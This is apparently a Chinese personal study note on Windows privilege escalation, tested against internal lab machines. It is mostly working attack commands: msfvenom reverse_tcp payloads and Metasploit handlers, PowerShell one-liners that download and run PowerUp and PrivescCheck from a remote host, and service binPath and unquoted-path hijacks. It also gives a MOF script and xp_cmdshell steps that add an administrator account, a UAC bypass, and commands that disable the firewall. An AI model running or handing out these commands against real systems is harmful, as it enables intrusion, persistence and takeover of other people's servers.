思路:使用工具检查出电脑上存在哪些漏洞,然后精准打击。
windows漏洞提权流程:能够执行cmd命令 --> 是否打补丁 --> 补丁对应exp --> 获取服务器权限
使用Vulmap,一个开源的在线本地漏洞扫描工具,项目地址:https://github.com/vulmon/vulmap/
这是一个Powshell脚本,从 Vulmon 获取实时漏洞数据,而不是依赖本地漏洞数据库。因此,即使是最新的漏洞也可以通过此方法检测到。在windows上的体验不好,linux还不错。
说它在windows上难用,是这样的,假设你是通过WEB进来了,你拿到的一般是个CMD窗口,而不是powshell,就算能拿到powshell,可能会像下面的虚拟机那样,运行失败,就,有点稀烂。
在物理主机上,运行结果如下:
有点意思,他检查出我的IDM和steam有漏洞,看了一眼评分9.3的IDM漏洞,如下,厂商也没修复,绝了。
项目地址:https://github.com/bitsadmin/wesng
WES-NG(Windows ExploitSuggester - Next Generation),可以给用户提供目标操作系统可能存在的漏洞列表,并针对这些漏洞给出漏洞利用实施建议。该工具的适用系统范围从Windows XP到Windows 10,还包括Windows Server等服务器/工作站版本。
使用方法就是先升级漏洞库,然后会下载下来一个名为“definitions.zip”的压缩包(我升级失败了,手动下载的这个压缩包),之后把systeminfo的信息和这个压缩包里面的内容做对比,找出漏洞。但是windows版本众多,各种语言的各种版本,还有盗版的,精简的……所以最终结果仅供参考。
wes.py --update
升级失败,无妨,画红线的地方,是我们要拿的东西,脚本下载失败,那就挂代理手动下载
https://raw.githubusercontent.com/bitsadmin/wesng/master/definitions.zip
WindowsVulnScan:一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,采用md5哈希算法确保数据不重复插入。
项目地址:https://github.com/chroblert/WindowsVulnScan
本工具查找是否有公开exp的网站为shodan,该网站限制网络发包的速度,因而采用了单线程的方式,且耗时较长
使用优势,只需要获取到对方的systeminfo信息即可。只不过需要对结果略做处理。
功能:
原理:
参数:
# author: JC0o0l
# GitHub: https://github.com/chroblert/
可选参数:
-h, --help show this help message and exit
-u, --update-cve 更新CVEKB数据
-U, --update-exp 更新CVEEXP数据
-m MODE, --mode MODE 搭配-U使用。更新模式 All:更新所有;Empty:只更新空白的;Error:只更新之前未成功更新的
-C, --check-EXP 检索具有EXP的CVE
-n PRODUCTNAME, --productName PRODUCTNAME
搭配-C使用。自定义产品名称,如Windows 10
-N PRODUCTVERSION, --productVersion PRODUCTVERSION
搭配-C使用。自定义产品版本,如20H2
-f FILE, --file FILE ps1脚本运行后产生的.json文件
使用方法:
KBCollect.ps
收集一些信息将运行后产生的KB.json
文件移动到cve-check.py
所在的目录
其实,KB.json
就是经过简单处理的systeminfo信息
python3 -m pip install requirements.txt
cve-check.py -u
创建CVEKB数据库cve-check.py -U
更新CVEKB数据库中的hasPOC
字段 此处可以使用-m选择更新模式。
-m All:更新所有
-m Empty:只更新hasPOC字段为空的
-m Error:只更新hasPOC字段为Error的
cve-check.py -C -f KB.json
查看具有公开EXP的CVE,如下:很无语,快折腾一下午了,笔记才写到这,各种稀奇古怪的问题,再次核查一下,发现网上说False是正常的,(第一次更新的话,时间会很长,1-2小时内)
知道缺失的cve之后,可以去msf里面搜索,或者github搜索,然后就是漏洞利用了
(1)获取一台win2012的VPS上的systeminfo信息,看看会怎么样
(2)获取我物理机上的systeminfo信息,看看会怎么样
使用http://blog.neargle.com/win-powerup-exp-index/
把systeminfo的信息粘贴进去,就可以获取到相关利用EXP。
有些时候,服务器可能会限制cmd的权限,或者限制 wscript.shell,都会影响提权。
罗嗦一下,法务论坛的后门有点瑕疵,在低版本的浏览器上可以正常使用,在较新的浏览器上会出现颜色异常,如下:
解决办法也很简单,使用Dark Reader插件,把浏览器调成夜色模式即可。
在确定可以执行cmd命令时,有些服务器会对目录进行权限设置,导致 iis_user 用户组没有权限对常见的目录进行写入和读取,这时可以用脚本对目录进行扫描,得到可写目录,之后上传或下载提权exp或替换文件进行利用。常见的脚本有 wt.asp、wt.aspx,红色表示文件可替换,蓝色表示目录可写。
net版本的 wt.aspx,因为net的权限比 asp大,而且能访问注册表,所以除了常规扫描目录之外,还会读取注册表软件目录进行目录扫描。
假设靶机的cmd不让用,那就尝试上传一个cmd上去。
c:\windows\debug\WIA\
,就拿他试试使用下面的命令,优势在于简单方便
针对win7之前的系统,就是使用at来计划执行任务,一旦执行,任务将是以system权限运行
at 17:27 /interactive cmd.exe
SC 是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于“控制面板”中“管理工具”项中的“服务”,据说是win7和win2008、win2003都可以用
sc Create syscmd binPath= "cmd /K start" type= own type= interact
sc start syscmd
微软官方的一个工具:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
PSTools工具是Sysinternal推出的一个Windows服务器远程管理工具包,由:
等多个工具组成,每个工具都有32位版和64位版的,无需安装,也不用在远程计算机上安装客户端,非常使用,官方说PSTools支持Windows NT/2000,没有说支持不支持更高版本的系统,据说,PSTools里面的工具在WinXP/2003/7/2008/8/8.1甚至Win10系统上都可以正常使用。
这里,我们只要PsExec.exe或者PsExec64.exe即可
psexec.exe -accepteula -s -i -d notepad.exe
psexec.exe -accepteula -s -i -d cmd.exe
常用的漏洞有以下这些
使用内部靶场 12server7 进行测试。
Microsoft服务器消息块(SMB)中存在特权提升漏洞。本地攻击者可通过转发适用于在同一计算机上运行的其他服务的身份验证请求,利用该漏洞使用提升的特权执行任意代码。
以下版本受到影响:Microsoft Windows Vista SP2,Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1,Windows Server 2012 Gold和R2,Windows RT 8.1,Windows 10 Gold和1511。
更详细描述参见:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2016/ms16-075
利用思路:通过EXP进行提权,然后添加一个用户至管理员组,如果目标开启了远程桌面,就尝试进行登录
EXP地址:https://github.com/itm4n/PrintSpoofer
来到大马的文件管理,选择可上传文件的路径C:\windows\debug\WIA\
,上传提权EXP
/c C:\windows\debug\WIA\PrintSpoofer64.exe -i -c "whoami"
升级系统版本
使用内部靶场 08serverR2-1 进行测试
Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它包含有窗口管理器、后台控制窗口和屏幕输出管理等。
如果Windows内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。
影响范围:该漏洞影响所有Windows x64,包括Windows 7 和 Windows Server 2008 R2 及以下版本。
首先判断能不能执行cmd,如果不能,就需要上传一个cmd。如果需要上传一个cmd,就需要判断哪些目录是可读写的。我这里已经准备好了一个cmd
显示效果怪怪的,是浏览器版本偏高导致的,在靶机上使用浏览器可以正常查看
CVE-2014-4113-Exploit.pdf
后缀改为rar解压接口。在网上找了随便找了一个,好像有点问题,无法在我的cmd下运行
接下来就是增加用户,连3389了,同上。
当Windows Background Intelligent Transfer Service (BITS)未能正确地处理符号链接时,存在权限提升漏洞。成功利用此漏洞的攻击者可以覆盖导致提升状态的目标文件。要利用此漏洞,攻击者首先必须登录到系统。然后,攻击者可以运行巧尽心思构建的应用程序,利用此漏洞并控制受影响的系统。
影响范围:地址1,地址2
下载EXP:https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases
假设你是一个普通用户,在cmd下运行此工具,它会弹出一个具有管理员权限的cmd窗口。把自己加入到管理员组即可。
思路:msfvenom生成后门来连接msf,查找目标有哪些可利用的漏洞,然后进行提权
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.239.141 lport=4444 -f exe >s.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.239.141
set lport 4444
exploit
发现当前账号权限较低。 需要进行提权。
run post/windows/gather/enum_patches
use post/multi/recon/local_exploit_suggester
set session 2
exploit
在上图中的多个exp中随意选择,不一定哪个能用哪个不能用
search ms16_075
use 1
set session 2
exploit
令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。
假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需要通过假冒域管理员的令牌进行攻击。
令牌有很多种:
访问令牌(Access Token):表示访问控制操作主体的系统对象
会话令牌(Session Token):是交互会话中唯一的身份标识符。
密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾
以上内容可以忽略不看,实操也非常简单,就3步
说人话就是:令牌窃取是一种可以权限提升的技术,适用的操作系统版本如下
假设我们现在已经获得了目标主机的权限,但是通过 getsystem 和其他方式提权失败。
use incognito #进入incognito模块
list_tokens -u #列出令牌
impersonate_token "NT AUTHORITY\SYSTEM" # 选择要窃取的账号
令牌的数据取决于当前获取权限的高低。实测的时候,发现和普通用户建立的会话,拿到的令牌列表没有system,甚至administrator。
所谓的烂土豆提权就是俗称的MS16-075,可以将权限提升到“NT AUTHORITY \ SYSTEM”
所以,一般从web拿到的 welshell都是IIS服务器权限,是具有这个模仿权限的。测试过程中,发现使用已经建好的账户(就是上面说的用户级账户)去反弹 meterpreter然后再去执行EXP的时候会失败,但使用菜刀(IIS服务器权限)反弹 meterpreter就会成功。
总之,我对这个的理解是iis账户,权限太低,不能通过令牌窃取,列出系统账号进行提权,所以需要烂土豆,然后就可以列出系统账号,获取system权限
烂土豆比热土豆的优点是
更多细节,参见烂土豆JUICYPOTATO提权原理和利用
条件有限,下面的案例来自网络
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
windows系统服务文件在操作系统启动时加载执行,并在后台调用可执行文件。如果一个低权限的用户对此类系统服务调用的可执行文件拥有写权限,那么就可以替换该文件,并随着系统启动获得控制权限。
windows服务是以system权限运行的,其文件夹、文件和注册表key-value都是受强制访问控制保护的。但是在某些情况下,操作系统中依然存在一些没有得到有效保护的服务。
PowerUp是Privesc模块下的一个脚本,功能相当强大,拥有很多可以用来寻找目标主机Windows服务漏洞进行提权的实用脚本。项目地址:https://github.com/HarmJ0y/PowerUp,要用到的是其中的 PowerUp.ps1 文件。
缺点:工具很久没有更新了,并且显示效果不大好。
在webshell上面执行如下命令来远程下载PowerUp.ps1
,测试结果如下图:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.239.132/PowerUp.ps1'); Invoke-AllChecks"
这个工具比 PowerUp 显示的内容更加详细。项目地址:https://github.com/itm4n/PrivescCheck.git
在webshell上面执行如下命令来远程下载PrivescCheck.ps1
,测试结果如下图:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.239.132/PrivescCheck.ps1'); Invoke-PrivescCheck"
搜索 NT AUTHORITY\SERVICE
,发现有一个叫 UsoSvc
的服务里面有它,用户是本地system。
NT AUTHORITY\SERVICE
拥有本机计算机的最小的权限,并且在网络中扮演一个计算机的角色,该账户没有密码
接下来的思路就是生成一个木马并上传到目标系统上面,然后告诉UsoSvc,你运行的时候,要运行这个木马文件。
sc query UsoSvc
sc stop UsoSvc
sc start UsoSvc
获取meterpreter
木马的准备与msf的监听,参见文章前面介绍的 MSF提权,此处不再赘述
C:\ProgramData\
目录下,上传木马。木马的文件路径:C:\ProgramData\s.exe
sc config usosvc binPath= "C:\ProgramData\s.exe"
虽然连接上了,但是当windows启动服务失败时,连接就会断开。因此需要设置进程迁移。
有session过来的话,会自动做进程迁移set AutoRunScript migrate -f
获取到一个低权限的sesion,然后查看目标系统有没有可利用的错误配置
通过命令执行的方式,直接运行木马,获取到一个低权限的session
exploit/windows/local/service_permissions
service_permissions模块会使用两种方式获取system权限,如果以管理员权限运行,会尝试创建并运行一个新的服务;如果当前权限不允许创建服务,会判断哪些服务的文件或文件夹的权限有问题,并对其进行劫持,在劫持服务时会创建一个可执行程序,其文件名和安装路径都是随机的。
发现只需要设置一下session就行了。
经过大量测试之后,权限提升为system。
Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:
Windows查找DLL目录及其顺序如下:
应用程序加载的目录
C:\Windows\System32
C:\Windows\System
C:\Windows
当前工作目录Current Working Directory,CWD
在PATH环境变量的目录(先系统后用户)
这样的加载顺序很容易导致一个系统dll被劫持,因为只要攻击者将目标文件和恶意dll放在一起即可,导致恶意dll先于系统dll加载,而系统dll是非常常见的,所以当时基于这样的加载顺序,出现了大量受影响软件。
详细文章介绍:https://www.anquanke.com/post/id/225911
这种技术,很鸡肋。
要满足一下条件才能成功:
通过webshell进行信息收集,制作dll木马并上传,替换dll,启动应用后成功
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.239.141 lport=4444 -f dll >./hack.dll
在“利用条件”中提到,软件需要可以被利用才行,什么意思呢?替换dll会导致软件不能正常运行,
有的软件虽然不能正常运行,但是可以反弹shell,上面的实验,就是这种
但有的软件是直接凉凉,没有反弹shell,而是报错,如下:
说人话,就是,要找出满足如下条件的路径:
在windows中存在这样一个情况,如果1个路径,或者文件中存在空格,需要将其使用双引号括住,才能正确被系统识别出来。如下
第1个命令没有用双引号括住,导致系统误认为C:\Program
是个程序,Files (x86)
是参数,从而出现了异常,不过,说来好笑的是,上面的操作是在powshell发生了异常,但是在cmd中,是不会报错的
攻击思路就是,找出服务中,既存在空格路径,还没有用双引号括住的路径。然后制造误会,让服务启动错误的程序,即可拿到system的shell
在cmd中执行如下命令,即可获取到服务中,存在空格的,可能不安全的服务。
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
可以看到,我这里存在一个不安全的服务,是关于的。所以,接下来就是msf生成名为Program.exe
的后门文件,放在c盘根目录下即可。启动服务的时候,为什么能发生攻击呢?路径没有包含在引号中,服务会按照以下顺序依次执行
c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe
Program.exe
的木马msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.239.141 lport=4444 -f exe >./Program.exe
发现程序正在运行,那怎么行,重启服务(视权限而定,不能重启服务就等重启电脑)
最后,服务是无法启动的,因为电脑已经找不到正确的程序了,它会报错
等它报错的时候,会话就会断开,所以,实战中需要上传别的后门,快速进行权限维持,或者使用上面介绍的进程迁移方式也行。
允许低权限用户以System权限安装文件。如果启用此策略设置项,那么任何权限的用户都以NT Authority\System权限来安装恶意的MSI文件。 windows install是windows操作系统的组件之一,专门用来管理配置软件服务。它除了是一个安装程序,还用于管理软件的安装、组件的添加、删除、监视文件的还原、通过回滚进行灾难恢复。windows install通过msiexec.exe安装MSI文件,双击MSI文件就会运行msiexec.exe。 原理:是因为用户打开了windows installer 特权安装功能。
说人话就是,借助某个软件,以低权限的身份,在目标上创建了一个高权限用户
另外,这种漏洞极少会碰到!
也可以使用命令行修改注册表
reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
Reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
使用PowerUp检测注册表是否有设置,如果返回 true 证明可以利用
(PowerUp.ps1参见上文** 利用工具1:PowerUp**)
/c PowerShell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString('http://192.168.239.132/PowerUp.ps1'); Get-RegAlwaysInstallElevated
禁用注册表键AlwaysInstallElevated。
除了系统自带的服务外 ,安装第三方的软件例如 mysql、sqlserver、ftp等应用软件,如果权限设置不对,会对服务器造成安全隐患,从而导致服务器被提权。
如果网站里面使用的数据库是 sqlserver,那么如果找到sa的密码,利用提权脚本提权。但是不一定能得到系统权限,还要看管理员的权限设置。 一般情况提权得到的是system权限或者pulic权限,均能执行命令。
web.config
config.asp
conn.aspx
database.aspx
这里假设已经通过敏感文件得到了数据库的密码。
Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
查看当前用户是一个普通用户,可以执行一些基础的命令。可以上传溢出提权工具,来提高当前用户的权限。
在 mysql 中可以使用自定义函数(udf = user defined function)进行提权,自定义函数,是数据库功能的一种扩展。用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像调用本机函数 version() 等方便。
如果是 MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下才能创建自定义函数。
在之前的文章 SQL注入 中提到过 secure_file_priv,只有这个参数后面什么都没有的时候,才行。否则,如下图:
一般来说,mysql数据库里面是没有plugin这个文件夹的。如果没有,直接gg。
SHOW VARIABLES LIKE "%plugin%"
MOF 提权是一个有历史的漏洞,基本上在 Windows Server 2003 的环境下才可以成功。提权的原理是C:/Windows/system32/wbem/mof/目录下的 mof 文件每隔一段时间(几秒钟左右)都会被系统执行,因为这个 MOF 里面有一部分是 VBS 脚本,所以可以利用这个 VBS 脚本来调用 CMD 来执行系统命令,如果 MySQL 有权限操作 mof 目录的话,就可以来执行任意命令了。
公开的nullevt.mof利用代码
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hacker P@ssw0rd /add\")\nWSH.run(\"net.exe localgroup administrators hacker /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
net.exe user moonteam$ xxx12456 /add && net localgroup administrators moonteam$ /add
流程:
G6 FTP Server 新一代的 FTP 服务器端软件,支持 RFC-959 标准并增强其中的某些功能,上传和下载都可以续传,实时查看运行状态,占用带宽,还有很多功能。
G6 FTP的默认端口为8021,只侦听在127.0.0.1的8021端口上,所以无法从外部直接访问,需要进行端口转发(使用lcx 工具)
查看到G6 ftp端口
在webshell访问配置文件 C:\Program Files (x86)\Gene6 FTP Server\RemoteAdmin\Remote.ini
流量转发
/c C:\inetpub\wwwroot\lcx.exe -tran 2333 127.0.0.1 8021
新打开一个标签页访问webshell地址,查看一下开放的端口
接下来的思路就是使用上文介绍的 “系统服务权限配置错误 之 利用工具3:MSF”
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.239.141 lport=4444 -f exe >Program.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.239.141
set lport 4444
exploit
来到路径:
ftp://192.168.239.165/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/
UAC(UserAccount Control,用户账户控制),是在Vista及更高版本的windows系统中通过弹框进一步让用户确认是否授权当前可执行文件,来达到阻止恶意程序的目的。
为了远程执行目标exe或者bat文件,就需要绕过此安全机制,以此叫BypassUAC(不弹窗直接运行执行文件)
kali生成个木马让靶机win10运行,以此先来获取一个session。此时的权限无法做一些敏感操作
一般情况下使用use exploit/windows/local/bypassuac
使用:exploit/windows/local/bypassuac_injection
虽然是system权限,但是不能hashdump,说明权限不到位。
发现目标是64位的,我们注入的是32位的,这个时候迁移到64位的进程里面就好了
提权问题经常伴随着远程桌面,这里请参见 潇湘信安 的笔记:查询和开启3389端口方式总结
额外的一些补充:
方法1:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\
查看PortNumber字段的值是3389,说明开启了远程桌面
方法2:
下面的两条命令都能查询到PortNumber的字段的值是0xd3d
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds" /s
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
查看0x3d这个值是多少,发现是3389.
set /a Port=0xd3d
方法1:
tasklist /svc | findstr "TermService"
netstat -ano | findstr "进程号"
方法2:
net start |find "Remote Desktop Services"
确定了目标开启了3389还是连接不上的话,可能是目标防火墙在干扰。可以尝试使用lcx做隧道处理,或者关闭防火墙。
netsh advfirewall show allprofile state 查询状态
netsh advfirewall set allprofiles state off 关闭防火墙
net stop “Windows Firewall” 关闭防火墙
sc config sharedaccess start= disabled 禁用防火墙
net stop sharedaccess 关闭防火墙
在关闭防火墙时,还是连接不上,可能是ipsec做了ip策略处理,导致连接失败。
可以使用命令 net stop "IPsec Policy Agent"
可以使用相同版本的终端进行连接,或者使用 xfreerdp连接会自动加密
net localgroup "Remote Desktop Users" asuka /add
终端超出最大连接数时可用下面的命令来连接
mstsc /v:ip:3389 /console
红队测试之Windows提权小结
Windows令牌窃取提权
【提权】Postgre&令牌窃取&进程注入
烂土豆JUICYPOTATO提权原理和利用
Windows提权笔记